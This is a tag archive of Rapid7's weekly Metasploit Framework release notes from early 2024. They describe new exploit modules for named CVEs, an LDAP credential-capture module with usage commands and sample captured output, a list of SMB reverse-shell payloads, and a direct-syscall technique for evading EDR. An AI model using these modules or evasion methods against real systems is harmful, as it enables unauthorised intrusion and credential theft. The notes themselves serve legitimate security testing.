Tag Archives: Metasploit

Metasploit Wrap-Up 03/15/2024

Post Syndicated from Zachary Goldman original https://blog.rapid7.com/2024/03/15/metasploit-wrap-up-03-15-24/

New module content (3)

GitLab Password Reset Account Takeover

Metasploit Wrap-Up 03/15/2024

Authors: asterion04 and h00die
Type: Auxiliary
Pull request: #18716 contributed by h00die
Path: admin/http/gitlab_password_reset_account_takeover
AttackerKB reference: CVE-2023-7028

Description: This adds an exploit module that leverages an account-take-over vulnerability to take control of a GitLab account without user interaction. The vulnerability lies in the password reset functionality as it’s possible to provide two email addresses so that
the reset code will be sent to both. It is therefore possible to provide the email
address of the target account as well as that of one we control, and to reset the password.

MinIO Bootstrap Verify Information Disclosure

Authors: RicterZ and joel <joel @ ndepthsecurity>
Type: Auxiliary
Pull request: #18775 contributed by 6a6f656c
Path: gather/minio_bootstrap_verify_info_disc
AttackerKB reference: CVE-2023-28432

Description: This adds an auxiliary module that leverages an information disclosure (CVE-2023-28432) in a cluster deployment of MinIO versions from RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z. This retrieves all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD.

JetBrains TeamCity Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18922 contributed by sfewer-r7
Path: multi/http/jetbrains_teamcity_rce_cve_2024_27198
AttackerKB reference: CVE-2024-27198

Description: This adds an exploit module that leverages an authentication bypass vulnerability in JetBrains TeamCity (CVE-2024-27198) to achieve unauthenticated RCE. The authentication bypass enables access to the REST API and creates a new administrator access token. This token can be used to upload a plugin which contains a Metasploit payload.

Enhancements and features (5)

  • #18835 from zgoldman-r7 – This PR reduces code duplication in the modules/exploits/windows/mssql/mssql_payload module.
  • #18899 from zeroSteiner – Updates the tools/payloads/ysoserial/dot_net.rb tool to add options for encoding the resulting payload as a viewstate.
  • #18930 from dwelch-r7 – This PR adds the ability to run a help command from within the interactive SQL prompt.
  • #18931 from cgranleese-r7 – Adds additional help information when interacting with an SQL session.
  • #18932 from adfoster-r7 – This PR adds PostgreSQL session type acceptance tests using Allure report generation as well as a local test module.

Bugs fixed (5)

  • #18944 from zeroSteiner – This fixes an issue when saving and loading DNS rules from the config.
  • #18945 from adfoster-r7 – Fixes an issue that caused a crash when running http crawler with database connected.
  • #18949 from zeroSteiner – This updates the DNS feature to notify the user a restart is required when the feature is enabled or disabled.
  • #18952 from cgranleese-r7 – Updates Postgres hashdump module to now work with newer versions of Postgres.
  • #18954 from adfoster-r7 – This PR fixes an issue where modules were not honoring spooler settings.

Documentation added (3)

  • #18868 from zeroSteiner – This adds documentation for the new DNS command.
  • #18937 from jjoshm – Fixes a typo in the Kerberos documentation.
  • #18951 from adfoster-r7 – This PR improves documentation on running Postgres acceptance tests locally.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Wrap-Up 03/08/2024

Post Syndicated from Jacquie Harris original https://blog.rapid7.com/2024/03/08/metasploit-wrap-up-03-08-2024/

New module content (2)

GitLab Tags RSS feed email disclosure

Metasploit Wrap-Up 03/08/2024

Authors: erruquill and n00bhaxor
Type: Auxiliary
Pull request: #18821 contributed by n00bhaxor
Path: gather/gitlab_tags_rss_feed_email_disclosure
AttackerKB reference: CVE-2023-5612

Description: This adds an auxiliary module that leverages an information disclosure vulnerability (CVE-2023-5612) in Gitlab versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1 to retrieve user email addresses via tags feed.

BoidCMS Command Injection

Authors: 1337kid and bwatters-r7
Type: Exploit
Pull request: #18827 contributed by bwatters-r7
Path: multi/http/cve_2023_38836_boidcms
AttackerKB reference: CVE-2023-38836

Description: This PR adds an authenticated RCE against BoidCMS versions 2.0.0 and earlier. The underlying issue in the vulnerability CVE-2023-38836 is that the file upload check allows a php file to be uploaded and executes as a media file if the GIF header is present in the PHP file.

Enhancements and features (11)

  • #18686 from h00die – This updates the existing auxiliary/scanner/ssh/ssh_version module with new checks for supported cryptographic algorithms and version detection capabilities.
  • #18715 from errorxyz – This adds a Splunk library for use by future modules. It also updates the existing exploit/multi/http/splunk_privilege_escalation_cve_2023_32707 module to use it.
  • #18796 from errorxyz – This updates the ManageEngine Endpoint Central and ServiceDesk Plus RCE modules for CVE-2022-47966. Particularly, it adds a Java target to be able to use Java-based payloads.
  • #18862 from sjanusz-r7 – This PR aligns the client’s peerhost and peerport API for the recently added SQL-based sessions (postgres, mssql, mysql).
  • #18875 from dwelch-r7 – This PR adds conditional validation of options depending on the chosen connection type, so for example if you want to connect via RHOST we also check (where applicable) that RPORT or the USERNAME is set. When a connection is made over an existing SESSION we can still allow the user to only set SESSION and not worry about the missing values only required for a new RHOST connection.
  • #18887 from cgranleese-r7 – Updates the search command to now search modules that are compatible with a specified session type, for instance: search session_type:meterpreter or search session_type:smb.
  • #18903 from sjanusz-r7 – This PR improves the UX by correctly handling databases changes by updating the prompt to now get the appropriate database value in the context of a MySQL or MSSQL session.
  • #18905 from cgranleese-r7 – Improves the pwd command output for SMB sessions.
  • #18908 from adfoster-r7 – Update SAMR computer and ICPR cert to support SMB sessions.
  • #18921 from dwelch-r7 – This adds the IP address to the SMB session prompt when there is no selected share.
  • #18926 from cgranleese-r7 – Update sessions to have a consistent set of local file system commands.

Bugs fixed (5)

  • #18844 from sfewer-r7 – This fixes a bug in the file dropper mixin that would prevent files from being deleted with a Windows shell session.
  • #18897 from adfoster-r7 – Updates the smb_login module to support configuring the negotiated SMB protocol versions and whether encryption is negotiated.
  • #18904 from double16 – Fixes the windows/gather/bloodhound module to no longer incorrectly validate the OutputDirectory option.
  • #18920 from dwelch-r7 – This PR fixes an issue with the autorunscript module option within an SMB session.
  • #18928 from dwelch-r7 – This PR fixes an issue when running the auxiliary/gather/windows_secrets_dump module while using the SESSION module option to connect, that caused the client to be disconnected and unable to be reused for subsequent runs/other modules.

Documentation (1)

  • #18929 from adfoster-r7 – Updates the Metasploit API documentation library to the latest available version to avoid CVE-2024-27285 – an XSS in the default YARD template. Thanks to Aviv Keller for reporting.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 03/01/2024

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2024/03/01/metasploit-weekly-wrap-up-03-01-2024/

Connect the dots from authentication bypass to remote code execution

Metasploit Weekly Wrap-Up 03/01/2024

This week, our very own sfewer-r7 added a new exploit module that leverages an authentication bypass vulnerability in ConnectWise ScreenConnect to achieve remote code execution. This vulnerability, CVE-2024-1709, affects all versions of ConnectWise ScreenConnect up to and including 23.9.7.The module creates a new administrator user account on the server, which is used it to upload a malicious extension (.ashx file) and get code execution as the NT AUTHORITY\SYSTEM user on Windows or root user on Linux, depending on the target platform.

New module content (1)

ConnectWise ScreenConnect Unauthenticated Remote Code Execution

Authors: WatchTowr and sfewer-r7
Type: Exploit
Pull request: #18870 contributed by sfewer-r7
Path: multi/http/connectwise_screenconnect_rce_cve_2024_1709

Description: This PR adds an unauthenticated RCE exploit for ConnectWise ScreenConnect (CVE-2024-1709).

Enhancements and features (8)

  • #18830 from sjanusz-r7 – Aligns the behavior of the MSSQL, PostgreSQL, and MySQL sessions. This functionality is currently behind a feature flag enabled with the features command.
  • #18833 from zeroSteiner – This catches an exception when updating a non-existing session. Prior to this PR, trying to run ‘sessions -k’ after running ‘workspace -D’ would result in a stack trace being printed to the console. This resolves issue #18561.
  • #18849 from adfoster-r7 – Adjusts the logic used for the visual indentation of tables.
  • #18872 from zgoldman-r7 – Updates the MSSQL modules to support querying database rows that contain boolean bit values.
  • #18878 from adfoster-r7 – This updates a number of rspec gems which help improve test suite error messages when string encodings are different.
  • #18879 from zeroSteiner – Updates the auxiliary/admin/kerberos/inspect_ticket module with improved error messages and support for printing Kerberos PAC credential information.
  • #18892 from zeroSteiner – Allows users to leverage the latest ADCS ESC13 technique. These changes are related to the identification of misconfigured certificate templates and workflow documentation. ldap_esc_vulnerable_cert_finder and ldap_query were also updated to improve usability.
  • #18893 from sjanusz-r7 – Updates the help command to visually align command names to the same width to improve readability.

Bugs fixed (2)

  • #18873 from cgranleese-r7 – Fixes a regression that caused a CreateSession option to be available for payloads that did not make sense.
  • #18880 from jmartin-tech – Fixes a bug with the auxiliary/capture/ldap module’s handling of NTLM hashes.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 02/23/2024

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2024/02/23/metasploit-weekly-wrap-up-02-23-2024/

LDAP Capture module

Metasploit Weekly Wrap-Up 02/23/2024

Metasploit now has an LDAP capture module thanks to the work of llcjngdjttrvddchfntdbinjblktjjetrtifdlibuchh
JustAnda7. This work was completed as part of the Google Summer of Code program.

When the module runs it will by default require privileges to listen on port 389. The module implements a default implementation for BindRequest, SearchRequest, UnbindRequest, and will capture both plaintext credentials and NTLM hashes which can be brute-forced offline. Upon receiving a successful Bind Request, a ldap_bind: Authentication method not supported (7) error is sent to the connecting client.

The module can be with run:

msf6 > use auxiliary/server/capture/ldap
msf6 auxiliary(server/capture/ldap) > run

Incoming requests will have their credentials stored for later use:

[+] LDAP Login attempt => From:10.0.2.15:48198 Username:User Password:Pass
[+] LDAP Login Attempt => From:127.0.0.1:55566	 Username:admin	 ntlm_hash::8aa0e517cd547b4032ff7e9c5359c200879aa5a8031d3d74	 Domain:DOMAIN

These values will be stored in the database for later retrieval:

msf6 auxiliary(server/capture/ldap) > creds
Credentials
===========
host       origin     service         public  private  realm        private_type  JtR Format
----       ------     -------         ------  -------  -----        ------------  ----------
10.0.2.15  10.0.2.15  389/tcp (ldap)  User    Pass     example.com  Password      

Ivanti exploit module

Another honorable mention for this week’s Metasploit release is a module by sfewer-r7 that chains two recently disclosed vulnerabilities(CVE-2024-21893 and CVE-2024-21887) in Ivanti gateways to achieve remote code execution on a vulnerable target. The vulnerabilities are both being widely exploited in the wild. Read Rapid7’s full technical analysis of the exploit chain in AttackerKB.

New module content (4)

Authentication Capture: LDAP

Author: JustAnda7
Type: Auxiliary
Pull request: #18678 contributed by jmartin-tech
Path: server/capture/ldap

Description: Adds a new auxiliary/server/capture/ldap module that emulates an LDAP Server. The server accepts a user’s bind request, and the user credentials or NTLM hash is then captured, logged, and persisted to the currently active database. An ldap_bind: Authentication method not supported (7) error is sent to the connecting client.

Ivanti Connect Secure Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18792 contributed by sfewer-r7
Path: linux/http/ivanti_connect_secure_rce_cve_2024_21893
AttackerKB references: CVE-2024-21887, CVE-2023-36661, CVE-2024-21893

Description: This module exploits the recently disclosed SSRF vulnerability (CVE-2024-21893) in Ivanti Connect Secure and Ivanti Policy Secure. The SSRF is chained to a command injection vulnerability (CVE-2024-21887) to achieve unauthenticated RCE.

Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.

Authors: BobTheShopLifter and Thingstad and h00die-gr3y [email protected]
Type: Exploit
Pull request: #18700 contributed by h00die-gr3y
Path: linux/http/kafka_ui_unauth_rce_cve_2023_52251
AttackerKB reference: CVE-2023-52251

Description: This PR adds an exploit module for a command injection vulnerability that exists in Kafka-ui between v0.4.0 and v0.7.1 that allows an attacker to inject and execute arbitrary shell commands via the groovy filter parameter at the topic section.

QNAP QTS and QuTS Hero Unauthenticated Remote Code Execution in quick.cgi

Authors: Spencer McIntyre, jheysel-r7, and sfewer-r7
Type: Exploit
Pull request: #18832 contributed by sfewer-r7
Path: linux/http/qnap_qts_rce_cve_2023_47218
AttackerKB reference: CVE-2023-47218

Description: The PR adds a module targeting CVE-2023-47218, an unauthenticated command injection vulnerability affecting QNAP QTS and QuTH Hero devices. CVE-2023-47218 was discovered and disclosed by Stephen Fewer.

Enhanced Modules (2)

Modules which have either been enhanced, or renamed:

  • #18125 from JustAnda7 – This PR adds a module to launch an LDAP service supporting capture and storage of Simple Authentication attempts. When launching this module with default options users must have permissions to bind to port 389.
  • #18681 from h00die – This PR updates the pre-existing apache_ofbiz_deserialization module to include functionality that will bypass authentication by using the newly discovered auth-bypass vulnerability: CVE-2023-51467.

Enhancements and features (8)

  • #18376 from JustAnda7 – This PR adds support for LDAP capture of NTLM authentication and adds a default implementation for LDAP BindRequest, SearchRequest, UnbindRequest, as well as a default action for unsupported requests.
  • #18817 from dwelch-r7 – This PR adds support to now bucket module options that are output after running the options command. This will be for modules that support either an RHOST or a SESSION connection to show that only one or the other is required when using the new session type features for SMB/MSSQL/MYSQL/PostgreSQL sessions.
  • #18847 from sjanusz-r7 – This PR adds proxy support for getting a PostgreSQL session via the postgres_login module.
  • #18848 from sjanusz-r7 – This PR adds proxy support for getting a MSSQL session via the mssql_login module.
  • #18854 from sjanusz-r7 – This PR adds proxy support for getting a MySQL session via the mysql_login module.
  • #18855 from sjanusz-r7 – This PR removes the cwd convention from SQL-based sessions, and instead uses a more appropriate def database_name computed value rather than a cached variable.
  • #18863 from sjanusz-r7 – This PR adds in the ENVCHANGE types to the MSSQL client mixin, and uses those to fetch the initial DB name received from the server.
  • #18864 from cgranleese-r7 – Adds an alias for ls and dir inside SMB sessions.

Bugs fixed (5)

  • #18770 from dwelch-r7 – Fixes a bug when multiple new session types (SMB, PostgreSQL, MSSQL, MySQL) were enabled with the features set postgresql_session_type true command.
  • #18842 from upsidedwn – Updates the Metasploit Dockerfile to correctly honor user provided bundler config arguments.
  • #18850 from adfoster-r7 – Fixes failing ldap server tests.
  • #18861 from cgranleese-r7 – Removes SessionType values from modules with OptionalSession mixin.
  • #18871 from adfoster-r7 – Fixes a crash when using the webconsole.

Documentation added (1)

  • #18857 from jlownie – Updates the Wiki documentation on running the Metasploit database to be more clear.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 02/16/2024

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2024/02/16/metasploit-weekly-wrap-up-02-16-2024/

New Fetch Payload

Metasploit Weekly Wrap-Up 02/16/2024

It has been almost a year since Metasploit released the new fetch payloads and since then, 43 of the 79 exploit modules have had support for fetch payloads. The original payloads supported transferring the second stage over HTTP, HTTPS and FTP. This week, Metasploit has expanded that protocol support to include SMB, allowing payloads to be run using rundll32 which has the added benefit of capturing the NetNTLM hashes of the requestor.

This also streamlines the workflow the user would have previously used by first starting the exploit/windows/smb/smb_delivery module, and then copying the command into another exploit. Now the user can simply select one of the SMB-enabled fetch payloads and Metasploit will manage the service and generate the command.

As an added benefit, since #18680 merged into Metasploit, multiple SMB services can be run simultaneously. This means that multiple SMB-enabled fetch payloads can have their own independent handlers running at the same time.

New module content (2)

Base64 Command Encoder

Author: Spencer McIntyre
Type: Encoder
Pull request: #18807 contributed by zeroSteiner

Description: This adds a new encoder module that leverages base64 encoding to escape bad characters in ARCH_CMD payloads for the Linux and UNIX platforms.

SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager

Authors: Spencer McIntyre, bwatters-r7, and sf [email protected]
Type: Payload (Adapter)
Pull request: #18664 contributed by zeroSteiner

Description: This adds an SMB fetch-payload service and a new payload to use it. The payload invokes rundll32 but handles everything for the user automatically.

This adapter adds the following payloads:

  • cmd/windows/smb/x64/custom/bind_ipv6_tcp
  • cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/custom/bind_named_pipe
  • cmd/windows/smb/x64/custom/bind_tcp
  • cmd/windows/smb/x64/custom/bind_tcp_rc4
  • cmd/windows/smb/x64/custom/bind_tcp_uuid
  • cmd/windows/smb/x64/custom/reverse_http
  • cmd/windows/smb/x64/custom/reverse_https
  • cmd/windows/smb/x64/custom/reverse_named_pipe
  • cmd/windows/smb/x64/custom/reverse_tcp
  • cmd/windows/smb/x64/custom/reverse_tcp_rc4
  • cmd/windows/smb/x64/custom/reverse_tcp_uuid
  • cmd/windows/smb/x64/custom/reverse_winhttp
  • cmd/windows/smb/x64/custom/reverse_winhttps
  • cmd/windows/smb/x64/encrypted_shell/reverse_tcp
  • cmd/windows/smb/x64/encrypted_shell_reverse_tcp
  • cmd/windows/smb/x64/exec
  • cmd/windows/smb/x64/loadlibrary
  • cmd/windows/smb/x64/messagebox
  • cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp
  • cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/meterpreter/bind_named_pipe
  • cmd/windows/smb/x64/meterpreter/bind_tcp
  • cmd/windows/smb/x64/meterpreter/bind_tcp_rc4
  • cmd/windows/smb/x64/meterpreter/bind_tcp_uuid
  • cmd/windows/smb/x64/meterpreter/reverse_http
  • cmd/windows/smb/x64/meterpreter/reverse_https
  • cmd/windows/smb/x64/meterpreter/reverse_named_pipe
  • cmd/windows/smb/x64/meterpreter/reverse_tcp
  • cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4
  • cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid
  • cmd/windows/smb/x64/meterpreter/reverse_winhttp
  • cmd/windows/smb/x64/meterpreter/reverse_winhttps
  • cmd/windows/smb/x64/meterpreter_bind_named_pipe
  • cmd/windows/smb/x64/meterpreter_bind_tcp
  • cmd/windows/smb/x64/meterpreter_reverse_http
  • cmd/windows/smb/x64/meterpreter_reverse_https
  • cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp
  • cmd/windows/smb/x64/meterpreter_reverse_tcp
  • cmd/windows/smb/x64/peinject/bind_ipv6_tcp
  • cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/peinject/bind_named_pipe
  • cmd/windows/smb/x64/peinject/bind_tcp
  • cmd/windows/smb/x64/peinject/bind_tcp_rc4
  • cmd/windows/smb/x64/peinject/bind_tcp_uuid
  • cmd/windows/smb/x64/peinject/reverse_named_pipe
  • cmd/windows/smb/x64/peinject/reverse_tcp
  • cmd/windows/smb/x64/peinject/reverse_tcp_rc4
  • cmd/windows/smb/x64/peinject/reverse_tcp_uuid
  • cmd/windows/smb/x64/pingback_reverse_tcp
  • cmd/windows/smb/x64/powershell_bind_tcp
  • cmd/windows/smb/x64/powershell_reverse_tcp
  • cmd/windows/smb/x64/powershell_reverse_tcp_ssl
  • cmd/windows/smb/x64/shell/bind_ipv6_tcp
  • cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/shell/bind_named_pipe
  • cmd/windows/smb/x64/shell/bind_tcp
  • cmd/windows/smb/x64/shell/bind_tcp_rc4
  • cmd/windows/smb/x64/shell/bind_tcp_uuid
  • cmd/windows/smb/x64/shell/reverse_tcp
  • cmd/windows/smb/x64/shell/reverse_tcp_rc4
  • cmd/windows/smb/x64/shell/reverse_tcp_uuid
  • cmd/windows/smb/x64/shell_bind_tcp
  • cmd/windows/smb/x64/shell_reverse_tcp
  • cmd/windows/smb/x64/vncinject/bind_ipv6_tcp
  • cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/vncinject/bind_named_pipe
  • cmd/windows/smb/x64/vncinject/bind_tcp
  • cmd/windows/smb/x64/vncinject/bind_tcp_rc4
  • cmd/windows/smb/x64/vncinject/bind_tcp_uuid
  • cmd/windows/smb/x64/vncinject/reverse_http
  • cmd/windows/smb/x64/vncinject/reverse_https
  • cmd/windows/smb/x64/vncinject/reverse_tcp
  • cmd/windows/smb/x64/vncinject/reverse_tcp_rc4
  • cmd/windows/smb/x64/vncinject/reverse_tcp_uuid
  • cmd/windows/smb/x64/vncinject/reverse_winhttp
  • cmd/windows/smb/x64/vncinject/reverse_winhttps

Enhancements and features (7)

  • #18706 from sjanusz-r7 – Updates multiple PostgreSQL modules to now work with PostgreSQL sessions. This functionality is behind a feature flag which can be enabled with features set postgres_session_type true.
  • #18747 from zgoldman-r7 – Updates the auxiliary/scanner/mssql/mssql_login module with a new CreateSession option which controls the opening of an interactive MSSQL session. This functionality is currently behind a feature flag which can be enabled with features set mssql_session_type true.
  • #18759 from cgranleese-r7 – Updates the multiple MySQL modules to work with a provided MySQL session instead of opening a new connection. This functionality is behind a feature flag which can be enabled with features set mysql_session_type true.
  • #18763 from zgoldman-r7 – Updates multiple MSSQL modules to now work with the new MSSQL session type that is enabled with features set mssql_session_type true.
  • #18806 from cgranleese-r7 – Improves unknown command handling by suggesting similar valid commands.
  • #18809 from zeroSteiner – Makes multiple improvements to the dns command – a new command which mimics the functionality of /etc/resolv.conf and /etc/hosts. This functionality is currently behind a feature flag which can be enabled with features set dns_feature true in msfconsole.
  • #18825 from cgranleese-r7 – Improves the error messages when the current session is not compatible with a post module.

Bugs fixed (13)

  • #18616 from adfoster-r7 – This fixes an issue with the AARCH64 SO ELF template that was causing SIGBUS exceptions to be raised.
  • #18774 from adfoster-r7 – Updates the following modules to now work with newer versions of sqlcmd:
    post/windows/gather/credentials/mssql_local_hashdump and post/windows/manage/mssql_local_auth_bypass.
  • #18786 from lihe07 – This fixes an option name collision between the exploit/linux/local/service_persistence when the payload is set to cmd/unix/reverse_netcat. The option to set the writable path is now BACKDOOR_PATH.
  • #18795 from cgranleese-r7 – Moves the CreateSession option from advanced into basic options for modules, in order to increase discoverability.
  • #18798 from upsidedwn – This fixes an issue in the exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move module’s check method that was causing version comparisons to fail.
  • #18799 from upsidedwn – This fixes an issue in the exploit/windows/local/cve_2020_17136 module’s check method that was causing version comparisons to fail.
  • #18800 from upsidedwn – This fixes an issue in the exploit/windows/local/cve_2021_40449 module’s check method that was causing version comparisons to fail.
  • #18801 from upsidedwn – This fixes an issue in the exploit/windows/local/cve_2022_26904_superprofile module’s check method that was causing version comparisons to fail.
  • #18812 from adfoster-r7 – Reverts the auxiliary/scanner/mssql/mssql_login modules’s TDSENCRYPTION default value to false.
  • #18813 from adfoster-r7 – Fixes a crash when running the help services or help hosts commands.
  • #18823 from cdelafuente-r7 – Fix module metadata platform list comparison.
  • #18826 from dwelch-r7 – Fixes a regression where the windows/smb/psexec module was not correctly performing cleanup logic.
  • #18828 from dwelch-r7 – Fixes a crash when exploit modules used nops.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 02/09/2024

Post Syndicated from Jack Heysel original https://blog.rapid7.com/2024/02/09/metasploit-weekly-wrap-up-02-09-2024/

Go go gadget Fortra GoAnywhere MFT Module

Metasploit Weekly Wrap-Up 02/09/2024

This Metasploit release contains a module for one of 2024’s hottest vulnerabilities to date: CVE-2024-0204. The path traversal vulnerability in Fortra GoAnywhere MFT allows for unauthenticated attackers to access the InitialAccountSetup.xhtml endpoint which is used during the products initial setup to create the first administrator user. After setup has completed, this endpoint is supposed to be no longer available. Attackers can use this vulnerability to create a user with Administrator privileges. Once Administrative privileges have been obtained for the GoAnywhere MFT application, uploading a .jsp payload in order to achieve RCE is trivial.

New module content (3)

runc (docker) File Descriptor Leak Privilege Escalation

Authors: Rory McNamara and h00die
Type: Exploit
Pull request: #18780 contributed by h00die
Path: linux/local/runc_cwd_priv_esc

Description: This adds a local privilege escalation exploit that leverages an internal file descriptor leak in runc versions prior to 1.1.12. An attacker with docker privileges is able write an arbitrary file on the host file system with the permissions of runc (typically root). With this, the module uploads a payload, sets the execute and the SUID permissions to escalate privileges.

Cacti RCE via SQLi in pollers.php

Authors: Aleksey Solovev and Christophe De La Fuente
Type: Exploit
Pull request: #18769 contributed by cdelafuente-r7
Path: multi/http/cacti_pollers_sqli_rce

Description: This PR adds an exploit module which leverages a SQLi (CVE-2023-49085) and a LFI (CVE-2023-49084) vulnerability in Cacti versions prior to 1.2.26 to achieve RCE.

Fortra GoAnywhere MFT Unauthenticated Remote Code Execution

Authors: James Horseman, Zach Hanley, and sfewer-r7
Type: Exploit
Pull request: #18762 contributed by sfewer-r7
Path: multi/http/fortra_goanywhere_mft_rce_cve_2024_0204

Description: This pull request adds an exploit module for CVE-2024-0204 which is a path traversal vulnerability which results in unauthenticated RCE in Fortra GoAnywhere MFT. GoAnywhere MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.

Enhancements and features (3)

  • #18696 from zgoldman-r7 – Introduces a standalone MSSQL client class that can be used in new contexts not tied to a specific module.
  • #18718 from cgranleese-r7 – Updates the auxiliary/scanner/mysql/mysql_login.rb module to include a new CreateSession option that opens an interactive session. This functionality is currently behind a feature flag which can be enabled with features set mysql_session_type true.
  • #18761 from dwelch-r7 – Adds a user notification that new modules support a CreateSession option. This functionality is currently behind a feature flag which can be enabled with the features command.

Bugs fixed (3)

  • #18704 from dwelch-r7 – Fixes a bug with framework having 0 registered nop modules when the defer-module-loads feature was enabled.
  • #18773 from sjanusz-r7 – Fixes an issue where Ctrl+Z and Ctrl+C when in the context of an interactive PostgreSQL shell prompt inside the PostgreSQL session type did work correctly.
  • #18803 from dwelch-r7 – Fixes a crash when using exploit/multi/handler with an invalid payload name.

Documentation added (1)

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 02/02/2024

Post Syndicated from Simon Janusz original https://blog.rapid7.com/2024/02/02/metasploit-weekly-wrap-up-02-02-2024/

Shared RubySMB Service Improvements

Metasploit Weekly Wrap-Up 02/02/2024

This week’s updates include improvements to Metasploit Framework’s SMB server implementation: the SMB server can now be reused across various SMB modules, which are now able to register their own unique shares and files. SMB modules can also now be executed concurrently. Currently, there are 15 SMB modules in Metasploit Framework that utilize this feature.

New module content (2)

Mirth Connect Deserialization RCE

Authors: Naveen Sunkavally, Spencer McIntyre, and r00t
Type: Exploit
Pull request: #18755 contributed by zeroSteiner
Path: multi/http/mirth_connect_cve_2023_43208

Description: This PR adds an exploit module for Mirth Connect. Versions < 4.4.1 are vulnerable to CVE-2023-43208 and CVE-2023-37679, where the former is a patch bypass for the latter. In both cases, an attacker can execute an OS command in the context of the target service using a specially crafted HTTP request and Java deserialization gadget. A technical analysis of CVE-2023-37679 is available in AttackerKB.

Puppet Config Gather

Author: h00die
Type: Post
Pull request: #18628 contributed by h00die
Path: linux/gather/puppet

Description: This PR adds a post gather module to get Puppet configs and other sensitive files.

Enhancements and features (2)

  • #18680 from zeroSteiner – This adds a service compatible with Rex::ServiceManager for SMB that can be shared among modules.
  • #18742 from sjanusz-r7 – Enhances the post/multi/gather/memory_search with additional UX improvements such as outputting a list of matched processes that are being targeted, as well as improved error handling if the process architecture is not correct.

Bugs fixed (2)

  • #18750 from adfoster-r7 – Updates the to_handler command for payload modules to support option overrides. The to_handler command is a convenient way of using multi/handler, setting the payload, and setting datastore options.
  • #18760 from adfoster-r7 – Fixes an issue where Metasploit fails to start when resolv.conf cannot be found.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 01/26/24

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2024/01/26/metasploit-weekly-wrap-up-01-26-24/

Direct Syscalls Support for Windows Meterpreter

Metasploit Weekly Wrap-Up 01/26/24

Direct system calls are a well-known technique that is often used to bypass EDR/AV detection. This technique is particularly useful when dynamic analysis is performed, where the security software monitors every process on the system to detect any suspicious activity. One common way to do so is to add user-land hooks on Win32 API calls, especially those commonly used by malware. Direct syscalls are a way to run system calls directly and enter kernel mode without passing through the Win32 API.

This first implementation focuses on substituting the Win32 API calls used by the Reflective DLL Injection (RDI) library with Direct Syscalls to the corresponding Native API’s. For example, VirtualAlloc has been substituted by a system call to ZwAllocateVirtualMemory. Since RDI is used everywhere by Meterpreter and its extensions, it was a very good candidate for this initial work.

The main difficulty is to find the correct syscall number since it is not the same across Windows versions. Also, EDR’s usually hook the NTDLL native API, making the discovery of syscall numbers more challenging. The technique used for this is based on the assumption that the syscall numbers are assigned in a sequential order, starting from the number 0. If we look at how native API functions are stored in memory, the syscall number can be deduced from the position of the related native API function in memory. The technique consists in selecting the system call functions (Zw…) from ntdll.dll exports and sorting them in ascending order of their memory addresses. The syscall number of one given native API function is simply its index in this sorted list. This is very similar to the technique used by Halo’s Gate.

